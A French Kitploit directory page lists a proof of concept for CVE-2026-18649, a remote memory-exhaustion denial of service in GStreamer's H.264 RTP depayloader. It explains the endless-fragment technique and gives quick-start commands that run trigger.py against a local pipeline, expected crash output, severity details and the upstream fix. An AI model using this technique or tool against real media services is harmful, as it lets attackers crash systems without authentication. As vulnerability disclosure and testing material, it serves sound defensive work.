Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-18649 — Proof of concept for CVE-2026-18649, a remote denial of service vulnerability in GStreamer's H.264 RTP depayloader (rtph264depay). | Kitploit
Outils/GitHubGitHub/0xsemizzz/cve-2026-18649
Payload GenerationVulnerability AnalysisExploitationNetwork Security
GitHub0xsemizzz/cve-2026-18649

CVE-2026-18649

Proof of concept for CVE-2026-18649, a remote denial of service vulnerability in GStreamer's H.264 RTP depayloader (rtph264depay).

Voir le dépôt
1il y a 14 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-18649 - GStreamer rtph264depay : DoS par croissance illimitée de la mémoire

Preuve de concept pour une vulnérabilité d'épuisement des ressources dans le dépayloader H.264 RTP de GStreamer (rtph264depay). Le même schéma affecte également rtph265depay.

Ce que c'est

Lors du réassemblage RTP fragmenté H.264 FU-A, chaque fragment entrant est poussé dans un tampon interne GstAdapter sans limite de taille. L'adaptateur ne se vide que lorsque le bit de fin de fragment (E) est défini dans l'en-tête FU. Un attaquant distant envoie un fragment de début valide, puis un flux infini de fragments de continuation sans jamais définir le bit E. Le tampon continue de croître jusqu'à ce que le processus manque de mémoire et plante.

  • À distance, aucune authentification nécessaire
  • Utilise uniquement des paquets RTP valides, aucune donnée malformée
  • Un seul flux suffit, pas d'inondation ni de connexions multiples nécessaires

Détails de la CVE

  • CVE: CVE-2026-18649 (NVD)
  • CWE: CWE-770 (Allocation sans limite ni régulation)
  • CVSS: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
  • Découvert par : Yehia Ali Mohamed Ezzat (0xsemizzz)

Rapport complet : 0xsemizzz.vercel.app/projects/gstreamer-cve

Versions affectées

gst-plugins-good avant le correctif en amont. Confirmé sur 1.28.2 (Ubuntu 24.04).

Démarrage rapide

Démarrez un pipeline, puis exécutez le PoC :

root@kitploit:~
gst-launch-1.0 udpsrc port=5036 buffer-size=4194304 \
  caps="application/x-rtp,media=video,payload=96,clock-rate=90000,encoding-name=H264" \
  ! rtph264depay ! fakesink &
PID=$!
python3 trigger.py 5036 $PID

Pour un crash rapide, ajoutez une limite de mémoire :

root@kitploit:~
ulimit -v 262144   # 256 MB, process dies in about 12 seconds
gst-launch-1.0 udpsrc port=5036 buffer-size=4194304 \
  caps="application/x-rtp,media=video,payload=96,clock-rate=90000,encoding-name=H264" \
  ! rtph264depay ! fakesink &
python3 trigger.py 5036 $!

Sortie attendue

root@kitploit:~
[*] port=5036  1 fragment every 0.5ms  (~2.8 MB/s)
[*] monitoring VmData (heap), not RSS
[*] target PID=12345  baseline VmData=26 MB

      5000 frags  ~     7 MB sent  |  VmData=35MB (+8MB)
     10000 frags  ~    13 MB sent  |  VmData=44MB (+17MB)
     15000 frags  ~    20 MB sent  |  VmData=53MB (+26MB)
     20000 frags  ~    27 MB sent  |  VmData=62MB (+35MB)
     25000 frags  ~    33 MB sent  |  VmData=71MB (+44MB)
     30000 frags  ~    40 MB sent  |  VmData=79MB (+53MB)
     ...
     DEAD

Le correctif

Une propriété max-reassembly-size a été ajoutée à rtph264depay et rtph265depay. Les applications doivent la définir à une valeur raisonnable (16 Mo pour la vidéo est typique). La valeur par défaut est 0 (illimité) pour la rétrocompatibilité.

Télécharger l’outil